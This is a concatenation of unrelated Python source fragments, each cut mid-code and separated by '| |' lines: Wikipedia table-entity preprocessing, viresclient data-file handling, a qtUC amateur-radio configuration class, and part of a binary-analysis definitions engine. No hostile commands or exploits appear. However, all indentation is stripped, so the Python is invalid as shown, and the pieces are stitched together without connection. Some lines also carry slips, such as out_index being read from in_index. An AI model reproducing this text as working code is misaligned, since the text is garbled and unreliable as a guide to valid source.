core_entity_mask = [0,1]+core_entity_mask
if entity_cand is not None:
entity_cand = list(set(entity_cand)-all_entities)
all_entity_set = list(all_entities)
def find_id(e, e_list):
for i, e_1 in enumerate(e_list):
if e == e_1:
return i
# pdb.set_trace()
raise Exception
if config.src == "train":
input_ent_local_id = [find_id(pgEnt, all_entity_set) if pgEnt!=-1 else 0,0]+[find_id(e, all_entity_set) for e in input_ent[2:]]
exclusive_ent_mask = np.full([len(input_ent), max([len(z) for _,z in column_en_map.items()])-1], 1000) # mask entity in the same column for prediction
for e_i, (index, _) in enumerate(entities):
tmp_j = 0
for e_i_0 in column_en_map[index[1]]:
if input_ent_local_id[2+e_i_0] != input_ent_local_id[2+e_i]:
exclusive_ent_mask[2+e_i,tmp_j] = input_ent_local_id[2+e_i_0]
tmp_j += 1
else:
input_ent_local_id = [find_id(pgEnt, all_entity_set) if pgEnt!=-1 else 0,0]
i = 2
while i < len(input_ent):
if input_ent[i]>=len(RESERVED_ENT_VOCAB):
e = input_ent[i]
input_ent_local_id.append(find_id(e, all_entity_set))
i+=1
else:
e = input_ent[i+1]
tmp_e = find_id(e, all_entity_set)
input_ent_local_id += [tmp_e, tmp_e]
i+=2
exclusive_ent_mask = None
if len(core_entities) > 1:
core_ent_local_id = [find_id(e, all_entity_set) for e in core_entities[1:]]
else:
core_ent_local_id = []
input_ent_cell_length = [len(x) if len(x)!=0 else 1 for x in input_ent_text]
max_cell_length = max(input_ent_cell_length)
input_ent_text_padded = np.zeros([len(input_ent_text), max_cell_length], dtype=int)
for i,x in enumerate(input_ent_text):
input_ent_text_padded[i, :len(x)] = x
return [table_id,np.array(input_tok),np.array(input_tok_type),np.array(input_tok_pos),(np.array(input_tok_mask[0]),np.array(input_tok_mask[1])),len(input_tok), \
np.array(input_ent),input_ent_text_padded,input_ent_cell_length,np.array(input_ent_local_id),np.array(input_ent_type),(np.array(input_ent_mask[0]),np.array(input_ent_mask[1])),len(input_ent), \
np.array(core_entity_mask),core_ent_local_id,all_entity_set,entity_cand,exclusive_ent_mask]
def process_single_hybrid_table_CER(input_table, config):
table_id,subject,pgEnt,pgTitle,secTitle,caption,headers,core_entities,core_entities_text,all_entities,entities,entities_text,entity_cand = input_table
tokenized_pgTitle = config.tokenizer.encode(pgTitle, max_length=config.max_title_length, add_special_tokens=False)
tokenized_meta = tokenized_pgTitle+\
config.tokenizer.encode(secTitle, max_length=config.max_title_length, add_special_tokens=False)
if caption != secTitle:
tokenized_meta += config.tokenizer.encode(caption, max_length=config.max_title_length, add_special_tokens=False)
tokenized_header = config.tokenizer.encode(headers[0][1], max_length=config.max_header_length, add_special_tokens=False)
input_tok = []
input_tok_pos = []
input_tok_type = []
tokenized_meta_length = len(tokenized_meta)
input_tok += tokenized_meta
input_tok_pos += list(range(tokenized_meta_length))
input_tok_type += [0]*tokenized_meta_length
tokenized_header_length = len(tokenized_header)
input_tok += tokenized_header
input_tok_pos += list(range(tokenized_header_length))
input_tok_type += [1]*tokenized_header_length
input_ent = [entity for _, entity in entities]
input_ent_text = [config.tokenizer.encode(entity_text, max_length=config.max_cell_length, add_special_tokens=False) if len(entity_text)!=0 else [] for entity_text in entities_text]
def find_id(e, e_list):
for i, e_1 in enumerate(e_list):
if e == e_1:
return i
# pdb.set_trace()
raise Exception
# prepend special token to input_ent, input_ent[0] = pgEnt, input_ent[1] = [CORE_ENT_MASK]
input_ent_local_id = [find_id(e, core_entities) for e in input_ent]
input_ent = [pgEnt if pgEnt!=-1 else 0, config.entity_wikid2id['[CORE_ENT_MASK]']] + input_ent
input_ent_text = [tokenized_pgTitle[:config.max_cell_length], []] + input_ent_text
input_ent_cell_length = [len(x) if len(x)!=0 else 1 for x in input_ent_text]
max_cell_length = max(input_ent_cell_length)
input_ent_text_padded = np.zeros([len(input_ent_text), max_cell_length], dtype=int)
for i,x in enumerate(input_ent_text):
input_ent_text_padded[i, :len(x)] = x
return [table_id,np.array(input_tok),np.array(input_tok_type),np.array(input_tok_pos),len(input_tok), \
np.array(input_ent),input_ent_text_padded,input_ent_cell_length,len(input_ent),np.array(input_ent_local_id),np.array(core_entities), \
entity_cand]
class WikiHybridTableDataset(Dataset):
def _preprocess(self, data_dir):
if self.mode == 0:
preprocessed_filename = os.path.join(
data_dir, "procressed_hybrid", self.src
)
elif self.mode == 1:
preprocessed_filename = os.path.join(
data_dir, "procressed_hybrid_CER", self.src
)
elif self.mode == 2:
preprocessed_filename = os.path.join(
data_dir, "procressed_hybrid_all", self.src
)
else:
raise Exception
preprocessed_filename += ".pickle"
if not self.force_new and os.path.exists(preprocessed_filename):
print("try loading preprocessed data from %s" % preprocessed_filename)
with open(preprocessed_filename, "rb") as f:
return pickle.load(f)
else:
print("try creating preprocessed data in %s" % preprocessed_filename)
try:
if self.mode == 0:
os.mkdir(os.path.join(data_dir, "procressed_hybrid"))
elif self.mode == 1:
os.mkdir(os.path.join(data_dir, "procressed_hybrid_CER"))
elif self.mode == 2:
os.mkdir(os.path.join(data_dir, "procressed_hybrid_all"))
else:
raise Exception
except FileExistsError:
pass
origin_data = open(os.path.join(data_dir, self.src + "_tables.jsonl"), "r")
entity_candidate_file = os.path.join(data_dir, self.src + ".entity_candidate.pkl")
if os.path.exists(entity_candidate_file):
with open(entity_candidate_file, "rb") as f:
entity_candidate = pickle.load(f)
else:
entity_candidate = None
print("Pre-processing data...")
origin_table_num = 0
actual_tables = []
table_removed = 0
for table in tqdm(origin_data):
origin_table_num += 1
table = json.loads(table.strip())
table_id = table.get("_id","")
pgTitle = table.get("pgTitle", "").lower()
pgEnt = table.get("pgId", -1)
if entity_candidate is not None:
entity_cand = entity_candidate.get(table_id, [])
entity_cand = [self.entity_wikid2id[z] for z in entity_cand if z in self.entity_wikid2id]
else:
entity_cand = None
if pgEnt != -1:
try:
pgEnt = self.entity_wikid2id[pgEnt]
except:
pgEnt = -1
secTitle = table.get("sectionTitle", "").lower()
caption = table.get("tableCaption", "").lower()
headers = table.get("processed_tableHeaders", [])
rows = table.get("tableData", {})
subject = table.get("subject_column", 0)
entity_columns = table.get("entityColumn", [])
headers = [[j, headers[j]] for j in entity_columns]
entity_cells = np.array(table.get("entityCell",[[]]))
core_entities = []
core_entities_text = []
all_entities = set()
if pgEnt!=-1:
all_entities.add(pgEnt)
num_rows = len(rows)
num_columns = len(rows[0])
entities = []
entities_text= []
split = [0]
tmp_entity_num = 0
for i in range(num_rows):
tmp_entities = []
tmp_entities_text = []
for j in range(num_columns):
if j in entity_columns:
if self.mode == 1 and j!=subject:
continue
if entity_cells[i,j] == 1:
try:
| |
the "SiteCode"/"IAGA_code" identifier
ds2 = ds2.set_index({"Site": codevar})
ds2 = ds2.rename({"Site": codevar})
return ds2
def make_pandas_DataFrame_from_csv(csv_filename):
"""Load a csv file into a pandas.DataFrame
Set the Timestamp as a datetime index.
Args:
csv_filename (str)
Returns:
pandas.DataFrame
"""
try:
df = pandas.read_csv(csv_filename)
except Exception:
raise Exception("Bad or empty csv.")
# Convert to datetime objects
df['Timestamp'] = df['Timestamp'].apply(
time_util.parse_datetime)
# Convert the columns of vectors from strings to lists
# Returns empty dataframe when retrieval from server is empty
if len(df) != 0:
# Convert the columns of vectors from strings to lists
for col in df:
if type(df[col][0]) is str:
if df[col][0][0] == '{':
df[col] = df[col].apply(
lambda x: [
float(y) for y in x.strip('{}').split(';')
])
df.set_index('Timestamp', inplace=True)
return df
class ReturnedDataFile(object):
"""For handling individual files returned from the server.
Holds the data returned from the server and the data type.
Data is held in a NamedTemporaryFile, which is automatically closed and
destroyed when it goes out of scope.
Provides output to different file types and data objects.
"""
def __init__(self, filetype=None, tmpdir=None):
self._supported_filetypes = ("csv", "cdf", "nc")
self.filetype = str() if filetype is None else filetype
if tmpdir is not None:
if not os.path.exists(tmpdir):
raise Exception("tmpdir does not exist")
if os.name == "nt":
self._file = tempfile.NamedTemporaryFile(
prefix="vires_", dir=tmpdir, delete=False)
self._file.close()
atexit.register(os.remove, self._file.name)
else:
self._file = tempfile.NamedTemporaryFile(
prefix="vires_", dir=tmpdir)
def __str__(self):
return "viresclient ReturnedDataFile object of type " + \
self.filetype + \
"\nSave it to a file with .to_file('filename')" + \
"\nLoad it as a pandas dataframe with .as_dataframe()" + \
"\nLoad it as an xarray dataset with .as_xarray()"
def open_cdf(self):
"""Returns the opened file as cdflib.CDF
"""
return FileReader._open_cdf(self._file.name)
def _write_new_data(self, data):
"""Replace the tempfile contents with 'data' (bytes)
"""
if not isinstance(data, bytes):
raise TypeError("data must be of type bytes")
# If on Windows, the file will be closed so needs to be re-opened:
with open(self._file.name, "wb") as temp_file:
temp_file.write(data)
def _write_file(self, filename):
"""Write the tempfile out to a regular file
"""
with open(self._file.name, "rb") as temp_file:
with open(filename, 'wb') as out_file:
shutil.copyfileobj(temp_file, out_file)
@property
def filetype(self):
"""Filetype is one of ("csv", "cdf", "nc")
"""
return self._filetype
@filetype.setter
def filetype(self, value):
if not isinstance(value, str):
raise TypeError("filetype must be a string")
value = value.lower()
if value not in self._supported_filetypes:
raise TypeError("Chosen filetype must be one of: {}".format(
self._supported_filetypes
))
self._filetype = value
@staticmethod
def _check_outfile(path, path_extension, overwrite=False):
"""Check validity of path and extension, and if it exists already
"""
if not isinstance(path, str):
raise TypeError("path must be a string")
if path.split('.')[-1].lower() != path_extension:
raise TypeError("Filename extension should be {}".format(
path_extension
))
if os.path.isfile(path) and not overwrite:
raise Exception(
"File not written as it already exists and overwrite=False"
)
def to_file(self, path, overwrite=False):
"""Saves the data to the specified file.
Only write to file if it does not yet exist, or if overwrite=True.
Currently handles CSV and CDF formats.
Args:
path (str): path to the file to save as
overwrite (bool): Will overwrite existing file if True
"""
self._check_outfile(path, self.filetype, overwrite)
self._write_file(path)
print("Data written to", path)
def to_netcdf(self, path, overwrite=False):
"""Saves the data as a netCDF4 file (this is compatible with HDF5)
Extension should be .nc
"""
self._check_outfile(path, 'nc', overwrite)
# Convert to xarray Dataset
ds = self.as_xarray()
ds.to_netcdf(path)
print("Data written to", path)
def as_dataframe(self, expand=False):
"""Convert the data to a pandas DataFrame.
Returns:
pandas.DataFrame
"""
if self.filetype == 'csv':
if expand:
raise NotImplementedError
df = make_pandas_DataFrame_from_csv(self._file.name)
elif self.filetype == 'cdf':
with FileReader(self._file) as f:
df = f.as_pandas_dataframe(expand=expand)
return df
def as_xarray(self, group=None, reshape=False):
"""Convert the data to an xarray Dataset.
Note:
Does not support csv
Only supports scalar and 3D vectors (currently)
Returns:
xarray.Dataset
"""
if self.filetype == 'csv':
raise NotImplementedError("csv to xarray is not supported")
elif self.filetype == 'cdf':
with FileReader(self._file) as f:
ds = f.as_xarray_dataset(reshape=reshape)
elif self.filetype == 'nc':
ds = xarray.open_dataset(self._file.name, group=group)
ds.attrs["Sources"] = self.sources
return ds
@property
def sources(self):
with FileReader(self._file) as f:
sources = f.sources
return sources
@property
def magnetic_models(self):
with FileReader(self._file) as f:
magnetic_models = f.magnetic_models
return magnetic_models
@property
def range_filters(self):
with FileReader(self._file) as f:
range_filters = f.range_filters
return range_filters
class ReturnedData(object):
"""Flexible object for working with data returned from the server
Holds a list of ReturnedDataFile objects under self.contents
Example usage::
...
data = request.get_between(..., ...)
data.sources
data.range_filters
data.magnetic_models
data.as_xarray()
data.as_dataframe(expand=True)
data.to_file()
"""
def __init__(self, filetype=None, N=1, tmpdir=None):
self.contents = [ReturnedDataFile(filetype=filetype, tmpdir=tmpdir)
for i in range(N)]
# filetype checking / conversion has been done in ReturnedDataFile
self.filetype = self.contents[0].filetype
def __str__(self):
return "viresclient ReturnedData object of type "+self.filetype +\
"\nSave it to a file with .to_file('filename')" + \
"\nLoad it as a pandas dataframe with .as_dataframe()" + \
"\nLoad it as an xarray dataset with .as_xarray()"
@property
def filetype(self):
"""Filetype string
"""
return self._filetype
@filetype.setter
def filetype(self, value):
if not isinstance(value, str):
raise TypeError("filetype must be a string")
self._filetype = value
@property
def sources(self):
""" Get list of source product identifiers.
"""
sources = set()
for item in self._contents:
sources.update(item.sources)
return sorted(sources)
@property
def magnetic_models(self):
""" Get list of magnetic models used.
"""
models = set()
for item in self._contents:
models.update(item.magnetic_models)
return sorted(models)
@property
def range_filters(self):
""" Get list of filters applied.
"""
filters = set()
for item in self._contents:
filters.update(item.range_filters)
return sorted(filters)
@property
def contents(self):
"""List of ReturnedDataFile objects
"""
return self._contents
@contents.setter
def contents(self, value):
if not isinstance(value, list):
raise TypeError("ReturnedData.contents should be a list")
for i in value:
if not isinstance(i, ReturnedDataFile):
raise TypeError(
"Items in ReturnedData.contents should be"
"of type ReturnedDataFile")
self._contents = value
def as_dataframe(self, expand=False):
"""Convert the data to a pandas DataFrame.
If expand is True, expand some columns, e.g.:
B_NEC -> B_NEC_N, B_NEC_E, B_NEC_C
B_VFM -> B_VFM_i, B_VFM_j, B_VFM_k
Args:
expand (bool)
Returns:
pandas.DataFrame
"""
return pandas.concat(
[d.as_dataframe(expand=expand) for d in self.contents])
def as_xarray(self, reshape=False):
"""Convert the data to an xarray Dataset.
Args:
reshape (bool): Reshape to a convenient higher dimensional form
Returns:
xarray.Dataset
"""
# ds_list is a list of xarray.Dataset objects
# - they are created from each file in self.contents
# Some of them may be empty because of the time window they cover
# and the filtering that has been applied.
ds_list = []
for i, data in enumerate(self.contents):
ds_part = data.as_xarray(reshape=reshape)
if ds_part is None:
print("Warning: ",
"Unable to create dataset from part {} of {}".format(
i+1, len(self.contents)),
"\n(This part is likely empty)")
else:
# Collect the non-empty Datasets
ds_list.append(ds_part)
if len(ds_list) == 1:
ds = ds_list[0]
else:
ds_list = [i for i in ds_list if i is not None]
if ds_list == []:
return None
ds = xarray.concat(ds_list, dim="Timestamp")
# # Test this other option:
# ds = self.contents[0].as_xarray()
# for d in self.contents[1:]:
# ds = xarray.concat([ds, d.as_xarray()], dim="Timestamp")
# return ds
#
# https://github.com/pydata/xarray/issues/1379
# concat is slow. Maybe try extracting numpy arrays and rebuilding ds
# Set the original data sources and models used as metadata
ds.attrs["Sources"] = self.sources
ds.attrs["MagneticModels"] = self.magnetic_models
ds.attrs["RangeFilters"] = self.range_filters
return ds
def to_files(self, paths, overwrite=False):
"""Saves the data to the specified files.
Only write to file if it does not yet exist, or if overwrite=True.
Currently handles CSV and CDF formats.
Args:
paths (list of str): paths to the files to save as
overwrite (bool): Will overwrite existing file if True
"""
nfiles = len(self.contents)
if not isinstance(paths, list) or not isinstance(paths[0], str):
raise TypeError("paths must be a list of strings")
if len(paths) != nfiles:
raise Exception(
"Number of paths must equal number of files ({})".format(
nfiles
))
for path, retdata in zip(paths, self.contents):
retdata.to_file(path, overwrite)
def to_file(self, path, overwrite=False):
"""Saves the data to the specified file, when data is only in one file.
Only write to file if it does not yet exist, or if overwrite=True.
Currently handles CSV and CDF formats.
.. note::
This is currently only implemented for smaller data when the
request has not been split into multiple requests - | |
# -*- coding: utf-8 -*-
#
# qtUC - pyUC with a QT interface
# Based on the original pyUC code, modified for QT5 use
# <NAME> - VK3VW - <EMAIL>
#
# pyUC ("puck")
# Copyright (C) 2014, 2015, 2016, 2019, 2020, 2021 N4IRR
#
# This software is for use on amateur radio networks only, it is to be used
# for educational purposes only. Its use on commercial networks is strictly
# prohibited. Permission to use, copy, modify, and/or distribute this software
# hereby granted, provided that the above copyright notice and this permission
# notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND DVSWITCH DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL N4IRR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#
# --------------------------------------------------------------------------- #
from logging import exception
import sys
import os
from pathlib import Path
import configparser
from PyQt5.QtCore import QSettings
import qtUC_util as ut
import qtUC_defs as defs
DOCPATH = os.path.join(os.path.expanduser('~'), 'Documents', 'qtUC')
CFGFILE = 'qtUC.ini'
# LOCAL_CFGFILE = 'qtUC_local.ini'
TGMACFILE = 'qtUC_tgmac.ini'
# Class to hold all the configuration variables used
class qtUCVars():
# flags / internal
valid = False
cfgfile = CFGFILE
# local_cfgfile = LOCAL_CFGFILE
tgmacfile = TGMACFILE
# must have
my_call = 'NOCALL'
subscriber_id = 0
repeater_id = 1
ip_address = ''
# should have
usrp_tx_port = 50100
usrp_rx_port = 50100
defaultServer = 'DMR'
useQRZ = True
SAMPLE_RATE = 48000 # Default audio sample rate for pyaudio (will be resampled to 8K)
out_index = None # Current output (speaker) index in the pyaudio device list
in_index = None # Current input (mic) index in the pyaudio device list
loopback = False # NOT USED?
dongle_mode = False # NOT USED?
mic_vol = 50 # NOT USED?
sp_vol = 50 # NOT USED?
vox_enable = False
vox_threshold = 200
vox_delay = 50
slot = 2
asl_mode = 0
minToTray = False # minimize to tray instead of closeing
pttToggle = False
txTimeout = 200
shortCalls = True
theme = 'system'
loglevel = 'Info'
# some basic details in case something barfs
talk_groups = {
'DMR': [('Disconnect', '4000'), ('Parrot', "9990#")],
'P25': [('Disconnect', '9999'), ('Parrot', '10')],
'YSF': [('Disconnect', 'disconnect'), ('Parrot', 'register.ysfreflector.de:42020')],
'NXDN': [('Unlink', '9999'), ('Parrot', '10')],
'DSTAR': [('Unlink', ' U'), ('Echo', 'REF001EL')]
}
macros = {}
radmenu = {}
noQuote = {ord('"'): ''}
# servers = sorted(talk_groups.keys())
# connected_msg = defs.STRING_CONNECTED_TO
level_every_sample = 1
NAT_ping_timer = 0
def __init__(self):
pass
def setupPaths(self):
# Assume the default config file name is in the same dir as .py file
apppath = str(Path(sys.argv[0]).parent)
# self.cfgfile = os.path.join(apppath, CFGFILE)
self.cfgfile = os.path.join(apppath, CFGFILE)
self.tgmacfile = os.path.join(apppath, TGMACFILE)
# be smart - should have been created in utils if non existent
if not os.path.isdir(DOCPATH):
try:
os.makedirs(DOCPATH)
ut.log.info('Created qtUC documents directory - ' + DOCPATH)
except Exception:
pass
else:
self.cfgfile = os.path.join(DOCPATH, CFGFILE)
# self.local_cfgfile = os.path.join(DOCPATH, LOCAL_CFGFILE)
self.tgmacfile = os.path.join(DOCPATH, TGMACFILE)
ut.log.info('Using base configuration ' + self.cfgfile)
# ut.log.info('Local configuration ' + self.local_cfgfile)
def validateConfigInfo(self):
self.valid = (self.my_call != "N0CALL") # Make sure they set a callsign
self.valid &= (self.subscriber_id != 0) # Make sure they set a DMR/CCS7 ID
self.valid &= (self.ip_address != "") # Make sure they have a valid address for AB
self.valid &= (self.ip_address != "1.2.3.4")
if not self.valid:
ut.log.info(defs.STRING_CONFIG_NOT_EDITED)
# return valid
def loadConfig(self):
# Load data from the default or passed config file
self.setupPaths(self) # setup some stuff
# load base config from ini fil(s)
if len(sys.argv) > 1:
self.cfgfile = sys.argv[1] # Use the command line argument for the path to the config file
else:
self.importConfig(self) # load 'em
# local overrides
self.importLocal(self) # local updates to talkgroups and/or macros
self.loadLocalConfig(self) # local UI settings and local details override
def importConfig(self):
# Parse config details
self.valid = False
config = configparser.ConfigParser(inline_comment_prefixes=(';',))
config.optionxform = lambda option: option
try:
try:
config.read(['./qtUC_dist.ini', self.cfgfile]) # check local dist for basic setup
except Exception:
ut.log.error(defs.STRING_CONFIG_FILE_ERROR + str(sys.exc_info()[1]))
# sys.exit('Configuration file \'' + cfgfile + '\' is not a valid configuration file! Exiting...')
return
# required
self.my_call = config.get('DEFAULTS', 'myCall', fallback='NOCALL').split(None)[0]
self.subscriber_id = int(config.get('DEFAULTS', 'subscriberID', fallback='0').split(None)[0])
self.repeater_id = int(config.get('DEFAULTS', 'repeaterID', fallback='1').split(None)[0])
self.ip_address = config.get('DEFAULTS', 'ipAddress', fallback='1.2.3.4').split(None)[0]
self.usrp_tx_port = [int(i) for i in config.get('DEFAULTS', 'usrpTxPort', fallback='12345').split(',')]
self.usrp_rx_port = int(config.get('DEFAULTS', 'usrpRxPort', fallback='50100').split(None)[0]) # normally the same port
self.defaultServer = config.get('DEFAULTS', 'defaultServer', fallback='DMR').split(None)[0]
# defaults
self.useQRZ = config.getboolean('DEFAULTS', 'useQRZ', fallback=True)
self.level_every_sample = int(config.get('DEFAULTS', 'levelEverySample', fallback='2'))
self.NAT_ping_timer = int(config.get('DEFAULTS', 'pingTimer', fallback='0'))
# self.loopback = bool(config.get('DEFAULTS', 'loopback', fallback=False).split(None)[0])
# self.dongle_mode = bool(config.get('DEFAULTS', 'dongleMode', fallback=False).split(None)[0])
self.vox_enable = config.getboolean('DEFAULTS', 'voxEnable', fallback=False) # .split(None)[0]
self.mic_vol = int(config.get('DEFAULTS', 'micVol', fallback='50').split(None)[0])
self.sp_vol = int(config.get('DEFAULTS', 'spVol', fallback='50').split(None)[0])
self.vox_threshold = int(config.get('DEFAULTS', 'voxThreshold', fallback='200').split(None)[0])
self.vox_delay = int(config.get('DEFAULTS', 'voxDelay', fallback='50').split(None)[0])
self.slot = int(config.get('DEFAULTS', 'slot', fallback='2').split(None)[0])
self.asl_mode = int(config.get('DEFAULTS', 'aslMode', fallback='0').split(None)[0])
# Audio devices
in_index = config.get('DEFAULTS', 'in_index', fallback='default')
if in_index.lower() == 'default':
self.in_index = None
else:
self.in_index = int(in_index)
out_index = config.get('DEFAULTS', 'out_index', fallback='default')
if out_index.lower() == 'default':
self.out_index = None # ?? or 0
else:
self.out_index = int(in_index)
# internal
self.minToTray = config.getboolean('DEFAULTS', 'minToTray', fallback=False)
self.pttToggle = config.getboolean('DEFAULTS', 'pttToggle', fallback=False)
self.shortCalls = config.getboolean('DEFAULTS', 'shortCalls', fallback=True)
self.txTimeout = int(config.get('DEFAULTS', 'txTimeout', fallback='200').split(None)[0])
# uc_background_color = readValue(config, 'DEFAULTS', 'backgroundColor', 'gray25', str)
# uc_text_color = readValue(config, 'DEFAULTS', 'textColor', 'white', str)
# talk_groups = {}
for sect in config.sections():
if (sect != "DEFAULTS") and (sect != "MACROS"):
self.talk_groups[sect] = config.items(sect)
# macros = {}
if "MACROS" in config.sections():
for x in config.items("MACROS"):
# self.macros[x[1]] = x[0]
self.macros[x[0]] = x[1] # use key: val not val: key :(
self.validateConfigInfo(self)
except Exception:
ut.log.error(defs.STRING_CONFIG_FILE_ERROR + str(sys.exc_info()[1]))
ut.log.error('Configuration file \'' + self.cfgfile + '\' is not a valid configuration file!')
def exportConfig(self):
# save current details
config = configparser.ConfigParser()
config.optionxform = str # preserve case ikeys/values
config.add_section('DEFAULTS')
config.set('DEFAULTS', 'myCall', self.my_call)
config.set('DEFAULTS', 'subscriberID', str(self.subscriber_id))
config.set('DEFAULTS', 'repeaterID', str(self.repeater_id))
config.set('DEFAULTS', 'ipAddress', self.ip_address)
config.set('DEFAULTS', 'usrpTxPort', str(self.usrp_tx_port))
config.set('DEFAULTS', 'usrpRxPort', str(self.usrp_rx_port))
config.set('DEFAULTS', 'defaultServer', self.defaultServer)
# defaults
config.set('DEFAULTS', 'useQRZ', self.useQRZ)
config.set('DEFAULTS', 'levelEverySample', str(self.level_every_sample))
config.set('DEFAULTS', 'pingTimer', str(self.NAT_ping_timer))
config.set('DEFAULTS', 'loopback', self.loopback)
config.set('DEFAULTS', 'dongleMode', self.dongle_mode)
config.set('DEFAULTS', 'voxEnable', self.vox_enable)
config.set('DEFAULTS', 'micVol', str(self.mic_vol))
config.set('DEFAULTS', 'spVol', str(self.sp_vol))
config.set('DEFAULTS', 'voxThreshold', str(self.vox_threshold))
config.set('DEFAULTS', 'voxDelay', str(self.vox_delay))
config.set('DEFAULTS', 'slot', str(self.slot))
config.set('DEFAULTS', 'aslMode', str(self.asl_mode))
# Audio devices
config.set('DEFAULTS', 'in_index', str(self.in_index))
config.set('DEFAULTS', 'out_index', str(self.out_index))
# internal
config.set('DEFAULTS', 'minToTray', self.minToTray)
config.set('DEFAULTS', 'pttToggle', self.pttToggle)
config.set('DEFAULTS', 'shortCalls', self.shortCalls)
config.set('DEFAULTS', 'txTimeout', str(self.txTimeout))
# talk_groups
tgkeys = list(self.talk_groups.keys())
for sect in tgkeys:
config.add_section(sect)
for itm in self.talk_groups[sect]:
config.set(str(sect), str(itm[0]), str(itm[1])) # itms are tuples (Disconnect, 4000) etc
# macros
config.add_section('MACROS')
for key in self.macros:
macval = str(self.macros[key])
config.set('MACROS', key, macval)
try:
with open(self.cfgfile, 'w') as cf:
config.write(cf)
except Exception:
ut.log.error(defs.STRING_CONFIG_FILE_ERROR + str(sys.exc_info()[1]))
ut.log.error('Unable to write configuration file \'' + self.cfgfile + '\'')
def importLocal(self):
# import any local tg/macro info
if not os.path.isfile(self.tgmacfile):
ut.log.info('TG/Macro file \'' + self.tgmacfile + '\' does not exist for import!')
return
config = configparser.ConfigParser(inline_comment_prefixes=(';',))
config.optionxform = lambda option: option
try:
try:
config.read(self.tgmacfile)
except Exception:
# ignore if the file does not exist
ut.log.error(defs.STRING_CONFIG_FILE_ERROR + str(sys.exc_info()[1]))
ut.log.error('TG/Macro file \'' + self.tgmacfile + '\' is not a valid configuration file!')
return
# talk_groups
for sect in config.sections():
if sect != "MACROS": # no defaults here
self.talk_groups[sect] = config.items(sect)
# macros
if "MACROS" in config.sections():
for x in config.items("MACROS"):
# self.macros[x[1]] = x[0]
self.macros[x[0]] = x[1] # use key: val not val: key :(
except Exception:
ut.log.error(defs.STRING_CONFIG_FILE_ERROR + str(sys.exc_info()[1]))
ut.log.error('Local TG/Macros file \'' + self.tgmacfile + '\' is not a valid configuration file!')
def exportLocal(self):
# save current talk_groups and macros
config = configparser.ConfigParser()
config.optionxform = str # preserve case ikeys/values
# talkgroups
tgkeys = list(self.talk_groups.keys())
for sect in tgkeys:
config.add_section(sect)
for itm in self.talk_groups[sect]:
config.set(str(sect), str(itm[0]), str(itm[1])) # itms are tuples (Discount, 4000) etc
# macros
config.add_section('MACROS')
for key in self.macros: # keys of the macros dict
macval = str(self.macros[key])
config.set('MACROS', key, macval)
try:
| |
MultiValues(offset_to_values={0: {top}})
result: Optional[MultiValues] = None
for addr in addrs_v:
if not isinstance(addr, claripy.ast.Base):
continue
if addr.concrete:
# a concrete address
concrete_addr: int = addr._model_concrete.value
try:
vs: MultiValues = self.state.memory_definitions.load(concrete_addr, size=size, endness=expr.endness)
except SimMemoryMissingError:
continue
memory_location = MemoryLocation(concrete_addr, size, endness=expr.endness)
self.state.add_use(memory_location, self._codeloc(), expr=expr)
result = result.merge(vs) if result is not None else vs
elif self.state.is_stack_address(addr):
stack_offset = self.state.get_stack_offset(addr)
if stack_offset is not None:
stack_addr = self.state.live_definitions.stack_offset_to_stack_addr(stack_offset)
try:
vs: MultiValues = self.state.stack_definitions.load(stack_addr, size=size, endness=expr.endness)
except SimMemoryMissingError:
continue
memory_location = MemoryLocation(SpOffset(self.arch.bits, stack_offset), size, endness=expr.endness)
self.state.add_use(memory_location, self._codeloc(), expr=expr)
result = result.merge(vs) if result is not None else vs
else:
l.debug('Memory address %r undefined or unsupported at pc %#x.', addr, self.ins_addr)
if result is None:
top = self.state.top(bits)
# TODO: Annotate top with a definition
result = MultiValues(offset_to_values={0: {top}})
return result
def _ail_handle_Convert(self, expr: ailment.Expr.Convert) -> MultiValues:
to_conv: MultiValues = self._expr(expr.operand)
bits = expr.to_bits
size = bits // self.arch.byte_width
if len(to_conv.values) == 1 and 0 in to_conv.values:
values = to_conv.values[0]
else:
top = self.state.top(expr.to_bits)
# annotate it
dummy_atom = MemoryLocation(0, size, endness=self.arch.memory_endness)
top = self.state.annotate_with_def(top, Definition(dummy_atom, ExternalCodeLocation()))
# add use
self.state.add_use(dummy_atom, self._codeloc(), expr=expr)
return MultiValues(offset_to_values={0: {top}})
converted = set()
for v in values:
if expr.to_bits < expr.from_bits:
conv = v[expr.to_bits - 1:0]
elif expr.to_bits > expr.from_bits:
conv = claripy.ZeroExt(expr.to_bits - expr.from_bits, v)
else:
conv = v
converted.add(conv)
return MultiValues(offset_to_values={0: converted})
def _ail_handle_Reinterpret(self, expr: ailment.Expr.Reinterpret) -> MultiValues:
_: MultiValues = self._expr(expr.operand)
bits = expr.to_bits
# we currently do not support floating-point operations. therefore, we return TOP directly
reinterpreted = self.state.top(bits)
return MultiValues(offset_to_values={0: {reinterpreted}})
def _ail_handle_ITE(self, expr: ailment.Expr.ITE) -> MultiValues:
_: MultiValues = self._expr(expr.cond)
iftrue: MultiValues = self._expr(expr.iftrue)
_: MultiValues = self._expr(expr.iffalse)
top = self.state.top(len(iftrue))
return MultiValues(offset_to_values={0: {top}})
def _ail_handle_Not(self, expr: ailment.Expr.UnaryOp) -> MultiValues:
operand: MultiValues = self._expr(expr.operand)
bits = expr.bits
r = None
operand_v = operand.one_value()
if operand_v is not None and operand_v.concrete:
r = MultiValues(offset_to_values={0: {~operand_v}})
else:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_BinaryOp(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
r = super()._ail_handle_BinaryOp(expr)
if isinstance(r, ailment.Expr.BinaryOp):
l.warning("Unimplemented operation %s.", expr.op)
top = self.state.top(expr.bits)
return MultiValues(offset_to_values={0: {top}})
return r
def _ail_handle_Add(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
expr0: MultiValues = self._expr(expr.operands[0])
expr1: MultiValues = self._expr(expr.operands[1])
bits = expr.bits
r = None
expr0_v = expr0.one_value()
expr1_v = expr1.one_value()
